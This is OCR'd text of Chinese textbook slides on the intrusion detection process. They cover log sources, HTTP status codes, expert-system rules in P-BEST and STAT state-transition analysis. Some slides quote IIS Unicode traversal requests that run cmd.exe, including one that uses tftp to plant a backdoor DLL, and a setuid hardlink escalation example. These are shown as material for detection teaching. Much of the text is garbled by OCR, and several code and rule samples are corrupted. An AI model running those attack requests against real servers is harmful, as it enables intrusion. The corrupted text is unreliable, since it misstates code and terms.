入侵检测流程

£户■瞽通离等载声“十一五”国家级规划教材

•

第章▲21世记鬲-桢

4偃0安生.制说PCE

入侵检测流程入侵检测技术

♦II元大主*

•薛龄蜡R则0而8城装

曹元大主编,人民邮电出版社,2007年

多人民邮电出版社入侵检测流程1

费POSTS&[ELECOMPRESS

第4章入侵检测流程

入侵检测流程:

□入侵检测的过程

□入侵检测系统的数据源

□入侵分析的概念

□入侵分析的模型

□入侵检测的分析方法

□告警与响应

多人民邮电出版社入侵检测流程2

方FOS15&1ELECOMPRESS

入侵检测的过程

:人民邮电出版社入侵检测流程3

rOSTS&TELECOMPRESS

信息收集

□入侵检测的第一步是信息收集，收集内容包括系统、网络、

数据及用户活动的状态和行为

□需要在计算机网络系统中的若干不同关键点（不同网段和不

同主机）收集信息

。尽可能扩大数据收集范围

。从一个源来的信息有可能看不出疑点，进行多点收集。

多人民邮电出版社入侵检测流程4

费POSTS&[ELECOMPRESS

信息收集

口入侵检测很大程度上依赖于收集信息的

可靠性和正确性

口入侵检测系统软件本身应具有相当强的

坚固性，防止被篡改而收集到错误的信

多人民邮电出版社入侵检测流程5

费POSTS&[ELECOMPRESS

信息收集的来源

□系统或网络的日志文件

□网络流量

□系统目录和文件的异常变化

□程序执行中的异常行为

多人民邮电出版社入侵检测流程6

BOSTS&TELECOMPRESS

信息分析

■模式匹配

■统计分析

■完整性分析，往往用于事后分析

人民邮电出版社入侵检测流程7

rOSTS&TELECOMPRESS

模式匹配

□模式匹配就是将收集到的信息与已知的网络入侵和系统误用模

式数据库进行比较，从而发现违背安全策略的行为

□一般来讲，一种攻击模式可以用一个过程（如执行一条指令）

或一个输出（如获得权限）来表示。该过程可以很简单（如通

过字符串匹配以寻找一个简单的条目或指令），也可以很复杂

（如利用正规的数学表达式来表示安全状态的变化）

多人民邮电出版社入侵检测流程8

费POSTS&[ELECOMPRESS

统计分析

□统计分析方法首先给系统对象（如用户、文件、目录和设备

等）创建一个统计描述，统计正常使用时的一些测量属性（如

访问次数、操作失败次数和延时等）

□测量属性的平均值和偏差将被用来与网络、系统的行为进行比

较，任何观察值在正常值范围之外时，就认为有入侵发生

人民邮电出版社入侵检测流程9

H)S15&TELECOMPKKSS

完整性分析

□完整性分析主要关注某个文件或对象是否被更改

□这经常包括文件和目录的内容及属性

□在发现被更改的、被安装木马的应用程序方面特别有效

多人民邮电出版社入侵检测流程10

方FOS15&1ELECOMPRESS

告警与响应

□当一个攻击事件被检测出来以后，IDS就应该根据入侵

事件的类型或性质做出相应的告警与响应。常见的方

式有：

o自动终止攻击过程；

□终止用户连接；

□禁止用户账号；

□重新配置防火墙阻塞攻击的源地址；

O向管理控制平台发出警告指出事件的发生；

o向网络管理平台发出SNMPTRAP;

。记录事件的日志，包括日期、时间、源地址、目的地址、描

述与事件相关的原始数据；

□执行一个用户自定义程序

多人民邮电出版社入侵检测流程11

费POSTS&[ELECOMPRESS

IDS的数据源

□基于主机的数据源

O系统运行状态信息

O系统记账信息

O系统日志

oC2级安全性审计信息

□基于网络的数据源

oSNMP信息

□网络通信包

□应用程序日志文件

□报警信息

□其它网络设备和安全产品的信息

多人民邮电出版社入侵检测流程12

POSTS&PRESS

Windows日志监测

□1.Windows日志

□Windows中也一4羊使用“事件查看器”来管理日志系

统，也同样需要用系统管理员身份进入系统后方可进

行操作，如图所示。

副流程13

多人民邮电出SI工

rOSTS&TELECOMPRESS

口通常有应用程序日志，安全日志、系统日志、DNS服

务器日志、FTP日志、WWW日志等等，可能会根据服

务器所开启的服务不同而略有变化。启动Windows

时，事件日志服务会自动启动，所有用户都可以查看

“应用程序日志”，但是只有系统管理员才能访问

“安全日志”和“系统日志”。系统默认的情况下会

关闭“安全日志”，但我们可以使用“组策略”来启

用“安全日志”开始记录。安全日志一旦开启，就会

无限制的记录下去，直到装满时停止运行。

口应用程序日志、安全日志、系统日志、DNS日志默认

位置：%systemroot%\system32\config,默认文件大小

512KB，但有经验的系统管理员往往都会改变这个默

认大小。

殄人民邮电出版袒入侵检测流程14

费POSTS&[ELECOMPRESS|

□安全日志文件：

□c:\systemroot\system32\config\SecEvent.EVT

□系统日志文件：

□c:\systemroot\system32\config\SysEvent.EVT

□应用程序日志文件：

□c:\systemroot\system32\config\AppEvent.EVT

□Internet信息服务FTP日志默认位置：c:\systemroot\sys

tem32\logfiles\msftpsvc1\。

□Internet信息服务WWW日志默认位置：

c:\systemroot\system32\logfiles\w3svc1\o

多人民邮电出版社入侵检测流程15

费POSTS&[ELECOMPRESS

□Windows2000中提供了一个叫做安全日志分析器

(CyberSafeLogAnalyst,CLA)的工具，有很强的日志

管理功能。

□一旦黑客在获得服务器的系统管理员权限之后就可以

随意破坏系统上的文件了，包括日志文件，想要隐藏

自己的入侵踪迹，就必须对日志进行修改。

□对事件日志移位能做到很好的保护。移位虽是一种保

护方法，但只要在命令行输入dirc:\*.evt/s(如系统安

装在D盘，则盘符为D),一下就可查找到事件日志位

置。

殄人民邮电出版袒入侵检测流程16

费POSTS&[ELECOMPRESS|

多人民邮电出版社入侵检测流程17

费POSTS&[ELECOMPRESS

2.日志分析

口面对庞大的日志记录，我们就会需要使用工具

对日志进行分析、汇总，日志分析可以帮助用

户从日志记录中获取有用的信息，以便用户可

以针对不同的情况采取必要的措施。

多人民邮电出版社入侵检测流程18

费POSTS&[ELECOMPRESS

□例1:分析网站在服务器上的访问日志是站长的

工作之一，在平时做搜索优化时，我们分析百

度，谷歌等搜索引擎有没有访问自己的网站并

有没有成功获取内容的一个方法就是分析网站

的日志文件，这样就可以了解并找出自己的网

站为什么不收录。

多人民邮电出版社入侵检测流程19

rOSTS&TELECOMPRESS

WWW日志举例

□4--[02/Jul/2006:15:30:41+0800]

66GET/seoblog/2006/04/17/user-friendly-website/HTTP/l.l55

20019031

“/swcMPRADA%B9%D9%B7%BD%CD

%F8%D5%BE&cl=3〃6iMozilla/4.0(compatible;MSIE6.0;

WindowsNT5.1;SV1;AlexaToolbar)59

多人民邮电出版社入侵检测流程20

7HOSTS&TELECOMPRESS

□4是IP

□[02/Jul/2006:15:30:41+0800]前面是日期，0800是时区；

□“GET是服务器的动作，不是GET就是POSP；GET是从服务器上

获取内容；

□/seoblog/2006/04/17/user-friendly-website/HTTP/1.1使用HTML1.1

协议获取相关内容200是返回状态码，200是成功获取；404是文

件没找到；401是需要密码，403禁止查看，500服务器错误。

19031是文件大小

□^/swd=PRADA%B9%D9%B7%BD%CD%F8

%D5%BE&cl=3"表示来路"Mozilla/4.0(compatible;MSIE6.0;

WindowsNT5.1;SV1;AlexaToolbar)”表示的是用户所使用的电

脑是与Netscape兼容的Mozilla浏览器，WindowsNT操作系统，浏

览器是IE6.0,装有AlexaToolbar。

殄人民邮电出版袒入侵检测流程21

费POSTS&[ELECOMPRESS|

口又如：25-dsmith

[10/Oct/1999:21:15:05+0500]"GET/index.html

HTTP/1.0"2001043

;人民邮电出版社入侵检测流程22

rOSTS&TELECOMPRESS

常见状态码

□2xx成功

□200正常；请求已完成。

口201正常；紧接POST命令。

□202正常；已接受用于处理，但处理尚未完

成。

口203正常；部分信息一返回的信息只是一部

分。

□204正常；无响应一已接收请求，但不存在要

回送的信息。

多人民邮电出版社入侵检测流程23

方FOS15&1ELECOMPRESS

□3xx重定向

□301永久转向一请求的数据具有新的位置且更改是永

久的。

□302暂时转向一请求的数据临时具有不同URI。

□303请参阅其它一可在另一URI下找到对请求的响

应，且应使用GET方法检索此响应。

□304文件未修改一未按预期修改文档，也就是客户端

缓冲版本还可以继续使用。

□305使用代理一必须通过位置字段中提供的代理来访

问请求的资源。

□306未使用一不再使用；保留此代码以便将来使用。

多人民邮电出版社入侵检测流程24

费POSTS&[ELECOMPRESS

□4xx客户机中出现的错误

□400非法请求一请求中有语法问题，或不能满足请

求。

□401未授权一未授权客户机访问数据。

□402需要付款一表示计费系统已有效。

□403禁止访问一即使有授权也不需要访问。

口404找不到一服务器找不到给定的资源；文档不存

在。

□407代理认证请求一客户机首先必须使用代理认证自

身。

□415介质类型不受支持一服务器拒绝服务请求，因为

不支持请求实体的格式。

殄人民邮电出版袒入侵检测流程25

费POSTS&[ELECOMPRESS|

□5xx服务器中出现的错误

□500内部错误一因为意外情况，服务器不能完

成请求或者服务器内部错误，通常是程序有问

题。

□501未执行一服务器不支持请求的工具。

□502错误网关一服务器接收到来自上游服务器

的无效响应。

□503无法获得服务一由于临时过载或维护，服

务器无法处理请求，例如负载过大等。

殄人民邮电出版袒入侵检测流程26

费POSTS&[ELECOMPRESS|

□有经验的管理员就可通过安全日志、FTP日

志和WWW日志来确定入侵者的IP地址以及

入侵时间。

口虚拟主机开通成功之后，会在您的FTP里面

自动生成4个文件夹，分别是：

“databases"；logofnes”,"others“Jwwwroot”。

多人民邮电出版社入侵检测流程27

费POSTS&[ELECOMPRESS

□wwwroot文件夹：该文件夹内存放可以通过

web访问的文件，您需要将您对外发布的网站

文件上传到该目录下，输入域名访问到的文件

将是该文件夹下的文件。

口databases文件夹：该文件夹同logofiles、others

文件夹一样，属于示可遢过web访问的文件

夹，即用户无法通过输入网址来访问这些文件

夹下的文件，您可以在这些文件夹下上传一些

不希望别人能够访问的文件。比如您可以将

access数据库存放在databases文件夹下，这样可

以最大化的保证您的数据库安全。

殄人民邮电出版袒入侵检测流程28

费POSTS&[ELECOMPRESS|

□logofiles文件夹：logoflles文件夹是日志文件，

该文件夹存放您的网站日志文件。通过日志文

件您可以查询到网站的一些访问记录。

□others文件夹：该站点存放您自定义的nS错误

文件。IIS默认的一些错误提示，比如404错

误，403错误，500错误等等，如果您觉得这些

错误提示不够个性化，您可以将您自定义的错

误提示上传到该目录下。

够人民邮电出版社入侵检测流程29

POS15&TELECOMPRESS

3.利用日志发现入侵踪迹

口我们一般使用系统日志、防火墙、检查IP报头(IP

header)的来源地址、检测Email的安全性以及使用入侵

检测系统(IDS)等来判断是否有入侵迹象。

□有经验的系统管理员就会利用一些日志审核工具、过

滤日志记录工具，最大程度的将日志文件利用起来，

就必须先制定管理计划。

□(1)指定日志做哪些记录工作？

□(2)制定可以得到这些记录详细资料的触发器。

多人民邮电出版社入侵检测流程30

费POSTS&[ELECOMPRESS

Unicode漏洞入侵日志记录

□如通过下面的编码查看目标机的目录文件：

□GET/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir200

则日志中会记录下此访问行为：

2003-03-0108:47:47-1880GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir200-

多人民邮电出版社入侵检测流程31

费POSTS&[ELECOMPRESS

□而下面一行是向我们的机器传送后门程序的记录：

2003-03-0108:47:47-1880GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+tftp%20-i%2029%20GET%20cool.dll%20c:\httpodbc.dll

502-

多人民邮电出版社入侵检测流程32

费POSTS&[ELECOMPRESS

入侵分析的概念

□入侵检测系统是一个复杂的数据处理系统，所涉及

到的问题域中的各种关系也比较复杂。

□从入侵检测的角度来说，分析是指针对用户和系统

活动数据进行有效的组织、整理并提取特征，以鉴

别出感兴趣的行为。这种行为的鉴别可以实时进

行，也可以事后分析，在很多情况下，事后的进一

步分析是为了寻找行为的责任人。

多人民邮电出版社入侵检测流程33

方FOS15&1ELECOMPRESS

入侵分析的目的

口重要的威慑力：目标系统使用IDS进行入侵分析，对

于入侵者来说具有很大的威慑力，因为这意味着攻

击行为可能会被发现或被追踪。

□安全规划和管理：分析过程中可能会发现在系统安

全规划和管理中存在的漏洞，安全管理员可以根据

分析结果对系统进行重新配置，避免被攻击者用来

窃取信息或破坏系统。

□获取入侵证据：入侵分析可以提供有关入侵行为详

细的、可信的证据，这些证据可以用于事后追究入

侵者的责任。

多人民邮电出版社入侵检测流程34

方FOS15&1ELECOMPRESS

入侵分析应考虑的因素

□需求

□子目标

□目标划分

□平衡

多人民邮电出版社入侵检测流程35

费POSTS&[ELECOMPRESS

入侵分析的模型

入侵分析处理过程可分为三个阶段:

□构建分析器；

□分析数据；

□反馈和更新。

人民邮电出版社入侵检测流程36

H)S15&TELECOMPRESS

构建分析器

□收集并生成事件信息

□预处理信息

□建立行为分析引擎

□将事件数据输入引擎中

□保存已输入数据的模型

人民邮电出版社入侵检测流程37

H)S15&TELECOMPRESS

分析数据

□输入事件记录

□事件预处理

□比较事件记录和知识库

□产生响应

人民邮电出版社入侵检测流程38

rOSTS&TELECOMPRESS

反馈和更新

□反馈和更新是一个非常重要的过程。

口在误用检测系统中，反映这个阶段的主要功能是攻击

信息的特征数据库是否可以更新。每天都能够根据新

攻击方式的出现来更新攻击信息特征数据库是非常重

要的。许多优化的信号引擎能够在系统正在监控事件

数据，没有中断分析过程的同时，由系统操作员来更

新信号数据库。

□在异常检测系统中，依靠执行异常检测的类型，历史

统计特征轮廓被定时更新。例如，在第1个入侵检测系

统IDES中，每天都进行特征轮廓的更新。每个用户的

摘要资料被加入知识库中，并且删除最老的资料。

殄人民邮电出版袒入侵检测流程39

费POSTS&[ELECOMPRESS|

入侵检测分析方法

用于误用检测的关键技术

用于异常检测的关键技术

人民邮电出版社入侵检测流程40

rOSTS&TELECOMPRESS

异常入侵检测模型

口人民邮电出版衽入侵检测流程41

rOSTS&TELECOMPRESS

异常检测

异常检测模型

:人民邮电出版社入侵检测流程42

rOSTS&TELECOMPRESS

异常检测

1.前提：入侵是异常活动的子集

2.用户轮廓(Profile):通常定义为各种行为参数及其

阈值的集合，用于描述正常行为范围

3.过程

监控分量化分比较》判定

.

修正

4.指标：漏报(々/se夕。sil/re),错报negative)

多人民邮电出版社入侵检测流程43

方FOS15&1ELECOMPRESS

异常检测

□如果系统错误地将正常活动定义为入侵，称为误报

(falsepositive)；如果系统未能检测出真正的入侵行为

则称用漏报(falsenegative)。

□特点：异常检测系统的效率取决于用户轮廓的完备性

和监控的频率。因为不需要对每种入侵行为进行定

义，因此能有效检测未知的入侵。同时系统能针对用

户行为的改变进行自我调整和优化，但随着检测模型

的逐步精确，异常检测会消耗更多的系统资源。

殄人民邮电出版袒入侵检测流程44

费POSTS&[ELECOMPRESS|

异常检测

□神经网络方法

□免疫系统方法

□遗传算法

口基于代理的检测

多人民邮电出版社入侵检测流程45

费TELECOMPRESS

误用入侵检测技术

□误用入侵检测的主要假设是具有能够被精确地

按某种方式编码的攻击，并可以通过捕获攻击

及重新整理，确认入侵活动是基于同一弱点进

行攻击的入侵方法的变种。

□1、基于模式匹配误用入侵检测方法

□2、基于专家系统误用入侵检测方法

□3、基于状态迁移分析误用入侵检测方法

□4、基于键盘监控误用入侵检测方法

□5、基于模型误用入侵检测方法

人民邮电出版社入侵检测流程46

H)S15&TELECOMPKKSS

误用入侵检测模型

殄人民邮电出版社入侵检测流程47

rOSTS&TELECOMPRESS

误用检测方法

□模式匹配方法：基于模式匹配的误用入侵检测方法是

最基本的误用入侵检测方法，该方法将已知的入侵特

征转换成模式，存放于模式数据库中，在检测过程

中，模式匹配模型将到来的事件与入侵模式数据库中

的入侵模式进行匹配，如果匹配成功，则认为有入侵

行为发生。

□专家系统方法：基于专家系统的误用入侵检测方法是

最传统、最通用的误用入侵检测方法。在诸如MIDAS、

IDES、下一代IDES(NIDES)、DIDS和CMDS中都使用了

这种方法。在MIDAS、IDES和NIDES中,应用的产品系

统是P-BEST,该产品由AlanWhithurst设计。而DIDS

和CMDS,使用的是CLIPS系统，是由美国国家航空和宇

航局开发的系统。

殄人民邮电出版袒入侵检测流程48

费POSTS&[ELECOMPRESS|

入侵检测的专家系统

在最早期的若干入侵检测系统中就已经开始使用专家

系统了。专家系统在知识库的基础上，根据所获得的事实

和已知的规则进行推导，并得出结论。使用专家系统的好

处是用户无须了解具体系统内部的工作原理，只需要解决

对问题的描述过程即可。但是，知识库的构建是一个耗时

费力的艰苦过程。

专家系统只能基于明确的、可靠的规则得出结论，对

于超出已有规则范围的事实无法得出有用的结论。

下面以PBEST为例，介绍专家系统在入侵检测中的应

用。

殄人民邮电出版袒入侵检测流程49

费POSTS&[ELECOMPRESS|

PBEST系统包括一个规则翻译器pbcc、一个运

行时例程库和一组垃圾收集例程。规则翻译器接收

一组规则（rule）和事实（fact）的定义后，生成一

组C语言的例程，用来“断言”（assert）事实和处

理规则。运行时例程库中包含了所有专家系统中的

共享代码，并且包括支持交互式专家系统引擎的例

程。这些交互式的环境将能够帮助用户查看程序的

运行情况、设置和清除断点、删除和“断言”事实

以及观察规则点火的影响轨迹等。

在构建一个专家系统之前，用户必须首先定义规

则）和模式类型（ptype）。下面是一个ptype的声

明示例o

ptype[countvalue:int]

殄人民邮电出版袒入侵检测流程50

费POSTS&lELECFM

以上声明的目的在于建立一个关于事实的模式

(pattern)或模板(template)o专家系统知识库中

的每条事实都是某个ptype类型的一个实例。ptype

类型为count的事实包含一个整数字段value。前述

声明将允许规则引用count类型的事实，并检查和修

改这些事实的value字段值。对于某一个给定类型，

总是存在多条事实与之对应。

一个模式类型ptype可以包括多个字段，如下所示。

ptype[sessionuserid:string,

terminal:string,

timeoutflag:int]

以上ptype声明建立了一个事实模式，包括了3个字

段，其中,userid和terminal字段都是字符串类型，而

:人民邮视电成出版的社tflag字段为整数类型。入侵检测流程51

rOSTS&TELECOMPRESS

规则可以引用特定事实，其包括匹配特定条件或值

的字段。例如，一条规则可以检查一个session类型

的事实，视其timeoutflag字段值是否为1。这可以通

过在其前提句中包含以下语句来实现：

[+sessiontimeoutflag==1]

在起始方括号后的“+”符，是用作某种类型的

“存在性量词”。这就是说，它允许规则来查看是

否存在任何满足特定条件的事实。以上的语句将匹

配任何其timeoutflag字段值为1的session类型的事

实。

规则也可以使用符，来确定是否不存在给定

类型的事实。下例将查看是否不存在userid字段为

THISUSER的session类型的事实。

殄人民邮电出版社userid==“THISUSER"]入侵检测流程52

方HOS&1ELECOMPRESS

==>

[/c|value+=l]

etc."'Incrementcountfact5svaluefield

注意，这里对事实的字段值做了修改。此时，原始

的事实失效，而具有修改后字段值的新事实将被加

入到知识库中。如果使用交互式操作环境时，用户

就能看到当一个事实被修改后，它将得到一个新的

号码。这表示系统将把规则优先绑定到修改后的事

实上，而不是先前创建但是已经失效的事实。

下面是一个完整的规则声明：

rule[SimuLogon(#1;*):

[+tr:transaction]

[+se:session|userid==tr.userid]

[?|se.terminal!=tr.terminal]

:人民邮电出版社入侵检测流程53

'K)S15&TELECOMPRESS

[!|printf(SimuLogon:user%satterminals%s,%s\\n,

tr.userid,tr.terminal,se.terminal)]

Htr]

[-|se]]

该条规则检测一个正在当前终端上登录，但是以前

已经在别处登录的用户。它通过检查若干

transaction事实(这些事实必须是以前用户1已声明

transaction类型的实例)，看其是否存在一个

session事实，其userid字段值与任何transaction事实

中对应字段值相同。如果存在这样的session事实，

则比较二者的terminal字段值，看是否相同。如果

不相同，则该规则“点火”。这条规则的假设前提

是其他的规则将检查登录活动，并为每个登录活动

创建一个session事实。

:人民邮电出版社入侵检测流程54

'K)S15&TELECOMPRESS

一条规则的语法完全由分隔符（方括号和==＞）来

决定。

一个规则声明由关键词rule起头，然后是一个名称

区，后跟一个冒号（:）。上述规则的名称区包括

名称SimuLogon,后面是一组包括在圆括号内的选

项参数。这里，#1选项表示该规则的等级为1。这

意味着如果多个规则都可以点火，则该规则将比较

低级别的规则先点火。星号（*）选项表示该规则

是可重复的。这意味着该规则可以重复点火，而无

需其他规则同时点火。若默认则表示该规则是不可

重复的，因为一旦规则的前提被满足，它将永远都

满足条件，则规则将一次次地点火。但上述规则将

删除满足条件的事实，从而避免类似的循环点火过

程。

多人民邮电出版社入侵检测流程55

牙POS15&1ELECOMPRESS

规则的体部分包括一系列的前提语句、分隔符==>

和一系列的结论语句。每个前提语句都包括某种条

件测试。第一条前提语句：

[+tr:transaction]

检查一条transaction事实。它赋以其别名tr。下一条

语句：

[+se:session|userid==tr.userid]

检查是否存在一个session事实,其userid字段值与

已发现的tr事实的对应字段值相等。如果发现这样

的一个事实，则赋予别名se。第三条语句：

[?|se.terminal!=tr.terminal]

检查在发现的session事实中的terminal字段值是否与

transaction事实的对应字段值不同。

:人民邮电出版社入侵检测流程56

'K)S15&TELECOMPRESS

如果上述的所有前提语句都满足了，该规则“点

火”，即结论语句开始执行。此条规则包括3条结

论语句。第一条语句：

[!|printf("SimuLogon:user%satterminals%s,%s\\n",

tr.userid,tr.terminal,se.terminal)]

调用对应的C语言函数。“！I”符表示这样的一个

调用。这里可以调用任意的C函数例程。pbcc能够

识别大多数内建的C函数，如果是用户自己创建

的，则必须事先声明。这里，可以像C语言中的结

构一样，引用事实中的字段值，表示形式为事实的

别名，后跟点号和字段名。

语句[-[tr]和[-耐将tr和se类型的事实从知识库中删

除。这样做有3个原因：第一，可以避免规则因为

人民邮电出版社入侵检测流程57

H)S15&TELECOMPRESS

同样的满足条件而循环点火。第二，将不造要也事

实从知识库中删除，有助于提高系统的运行速度。

第三个原因是节约内存。

入侵检测流程58

多人民邮电出版社

t*OSI、&TELECOMPRESS

基于状态转移分析的入侵检测技术

基于状态转移分析的入侵检测模型，最初的明

确概念是在20世纪90年代初由美国加州大学圣巴巴

拉分校的Porras和Ilgun盘出并实凯的。最新一代的

采用STAT技术的系统称为NetSTAT系统，其特点

是脱离了单纯进行主机入侵检测的结构，实现了分

布式的入侵检测架构。基于状态转移分析的检测模

型，将攻击者的入侵行为描绘为一系列的特征操作

及其所引起的一系列系统状态转换过程，从而使得

目标系统从初始状态转移到攻击者所期望的危害状

TLXO

人民邮电出版社入侵检测流程59

H)S15&TELECOMPRESS

在状态转移分析技术中，具体采用“状态转移

图”来表示一个具体的入侵攻击过程。STAT系统

在状态转移图和目标系统审计记录的基础上，不断

跟踪攻击者在完成整个攻击工程中所必须完成的每

个关键步骤。

多人民邮电出版社入侵检测流程60

POS15&1ELECOMPRESS

此种检测方法明显不同于其他的基于审计记录直

接匹配的检测技术，它所具有的优点如下：

①直接采用审计记录序列来表示攻击行为的方法

不具备直观性。而STAT采用高层的状态转移

表示方法来表示攻击过程，避免了这一问题。

②对于同一种攻击行为可能对应着不同的审计记

录序列，这些不同审计记录序列可能仅仅因为

一些细微的差别而无法被采用直接匹配技术的

检测系统察觉，而STAT可以较好地处理这种

情况。

殄人民邮电出版袒入侵检测流程61

费POSTS&lELECFM

③STAT能够检测到由多个攻击者所共同发起的协

同攻击，以及跨越多个进程的攻击行为。另外，

STAT的一大特色就是具备在某种攻击行为尚未造

成实质危害时，就及时检测到并采取某种响应措施

的能力。

多人民邮电出版制入侵检测流程62

从本质上看，STAT属于基于规则分析的滥

用入侵检测系统，因此只能检测到已知的攻击类

型，但是STAT能够较好地处理已知攻击类型的变

种行为。

状态转移图就是对攻击行为的图形化表示方

法。状态转移图由两个基本组件构成：表示系统

状态的结点和表示特征行为的弧线，如图所示。

多人民邮电出版社入侵检测流程63

多^BOSTS&TELECOMPRESS

斗大态(State)操作(Action)

图状态转移图的基本组件

;人民邮电出版社入侵检测流程64

rOSTS&TELECOMPRESS

状态转移图通常包括一个初始状态、一个最终

状态以及若干攻击行为步骤，及其引起的若干中间

状态，如图所示。

Action

初始状态

图状态转移图的示意

殄人民邮电出版社入侵检测流程65

rOSTS&TELECOMPRESS

在构建状态转移图的过程中，通常只选取那些

最能代表攻击过程并同时引起系统状态改变的关键

操作。对于每个具体的攻击行为，都可能存在不同

的状态转移图的表示方法。

对于每个状态结点，都对应着一组状态断言。

当满足该组断言后，本次从上个状态到本状态的转

移过程才成功发生。状态断言的选择和关键行为的

选择一样，都是构成状态转移图的关键所在。

殄人民邮电出版袒入侵检测流程66

费POSTS&lELECFM

下面以一个简单的例子来展示状态转移图的构成

过程。该例子代表着UNIX环境下的一次攻击

行为，其步骤如下：

%Intarget-x

%-x

入侵检测流程67

多人民邮电出版社

K)SiS&IELECOMPRESS

这里，文件target代表一个setuid的shell脚本，其属

主为根用户(root)。文件target中首行包含字符串

“#!/bin/sh”。

上述的攻击步骤过程说明如下：

①攻击者对属主为root且具有setuid特性的shell脚本

target,创建一个硬连接(hard-link)文件，该连接

文件的名称以字符开头。

多人民邮电出版社入侵检测流程68

POS15&1ELECOMPRESS

②攻击者执行该连接文件“-X”。

为了创建对应的状态转移图，首先确定在

上述攻击行为中，必须包含两个关键的操作行

为：首先是用户创建一个所需的文件，然后执

行这个文件。两个关键行为可以表示为

“CREATE”和“EXECUTE"。此时，对应的不

完整状态转移图如图所示。

多人民邮电出版社入侵检测流程69

费POSTS&1ELECCMPRESS

CreateFileExecuteFile

图构建状态转移图Step-1

第二步，确定这些关键操作所引起的状态变

化。对于第一个操作而言，并不需要任何前提状态

条件，因此初始状态为NULL。攻击者执行攻击步

骤后，最后所导致的最终状态是获得了root的访问

权限，即其有效用户1ID(effectiveuserId)变为

rooto所以，最终状态可以采用下面的断言来定

义：

euid(user)=root

殄人民邮电出版袒入侵检测流程70

费POSTS&lELECFM

接下来的问题就是如何确定中间状态，此时就要

用到前述对攻击过程的分析知识了。

新创建的文件名称应该以开头，后面接任意字

符串，表示为：

name(file)=-*

新创建的文件与所连接的目标文件具有相同的属主信

息，因此：

owner(file)=root

该连接文件应该是一个具备setuid特性的脚本文件，

所以应该满足：

access(file,suid)=true

shell_script(file)=true

最后，显而易见，该文件属于连接文件，应该满足：

殄人民邮电出版袒入侵检测流程71

费POSTS&lELECFM

link(file)=true

的过上面的分析，最终形成的状态转移图如图所

/J\O

owner(file)=root

access(file,suid)=TRUE

shell_script(file)=TRUE

link(file)=TRUE

图最终的状态转移图

人民邮电出版社入侵检测流程72

H)S15&TELECOMPRESS

从上述的分析过程可以看出，构建状态转移图的过

程大致分为如下步骤：

①分析具体的攻击行为，理解内在机理。

②确定攻击过程中的关键行为点。

③确定初始状态和最终状态。

④从最终状态出发，逐步确定所需的各个中间状态

及其应该满足的状态断言组。

多人民邮电出版社入侵检测流程73

审计记录流

1

图系统架构示意图入侵检测流程

多人民邮电出版社STAT74

费POSTS&lELECFMPRESS

在图4-7所示的STAT系统设计图中，规则库中的状

态描述表和特征操作表是系统设计的核心内容之

一。在早期的USTAT原型中，这两张表都是用文本

文件的方式存储在永久介质上，然后再读入到内存

中形成对应的数据结构。

在状态描述表中，对每个状态转移图，都对应一组

状态断言集合；每组断言集合在文件中以字段串

“SDT；起头（数字〃代表第〃个状态转移图），下

接若干行断言组，形式如下所示：

SDTn

State-listl.

State-list2.

经人民邮电出版社入侵检测流程75

费HISIS&TELECOMPRESS

每个断言组State-list都包含若干个状态断言，表明

当前状态的情况。每行以和换行符结束。状

态断言之间以“$”符号连接表明逻辑“与”关

系，以符号连接表明逻辑“或”关系。在断言

前加上关键字not,则表示对断言值求反。

STAT的状态描述表文件示例如下。

#STATEDESCRIPTIONTABLE

#FOR

#USTAT

#

#

#Unauthorizedaccesstouserprivileges

#StateDescription-1

#

SD1:

name(filel)=¬owner(filel)=USER&permitted(SUID,filel)

&shell_script(filel)&permitted(XGRP,filel)

|permitted(XOTH,file1).

:人民邮电出版社入侵检测流程76

'K)S15&TELECOMPRESS

noteuid=USER.

#

特征操作表的结构与状态描述表类似，对于每个状

态转移图，都对应一组特征操作集合，形式如下所

示：

SIGn:

Action1;

Action2;

STAT的特征操作表文件示例如下。

#SIGNATUREACTIONSTABLE

#fbr

#USTAT

#

#Unauthorizedaccesstouserprivileges

#SignatureActions-1

#

SIGI:

hardlink(filel,file2).

Q~VQC11~i~Qfflel).

多人民邮电出版社入侵检测流程77

rOSTS&TELECOMPRESS

#

#Unauthorizedaccesstouserprivileges

#SignatureActions-2

#

SIG2:

modify_perm(filel).

#

从状态描述表和特征操作表的结构可以看出，对于

每组状态断言而言，都对应着一组特征操作。两张

表之间存在着一一对应的关系，其中每个特征操作

都对应着用来表明某一个状态的一组状态断言。

在后继的STAT版本中，采用了STATL语言来描述

每一种攻击过程所代表的状态转移图。STATL语言

具备自己的语法和语义定义，但是其中最核心的概

念定义还是两个：状态和转移。下面给出一个用

STATL语言表示攻击过程的简化例子。

殄人民邮电出版袒入侵检测流程78

费POSTS&lELECFM

Scenarioexample

constintthreshold=64;

intcounter;

initial

statesi{}

states2

(

counter>threshold

{log("counteroverthreshold!!");}

transitiontl(sl->s2)

(

[READr]:r.euid!=r.uid

)

人民邮电出版社入侵检测流程79

H)S15&TELECOMPKKSS

上例中，关键字Scenario定义了一个攻击场景

example（即对应一个STD）,其中包括两个状态

定义si和s2,以及一个转移定义tl（从状态si到状

态s2的转移）。STATL语言中规定必须定义一个初

始状态，这里为si。状态s2中存在一个断言，而在

转移tl中定义了一个特征操作r,并且要满足特定条

件。

多人民邮电出版社入侵检测流程80

POSTS&TELECOMPRESS

有色Petri网方法

开始状态结束状态

startaftersynafter_syn+ackafterack

多人民邮电出版社入侵检测流程81

费IELECCMPKE5S

异常入侵检测模型

口人民邮电出版衽入侵检测流程82

rOSTS&TELECOMPRESS

异常检测

异常检测模型

:人民邮电出版社入侵检测流程83

rOSTS&TELECOM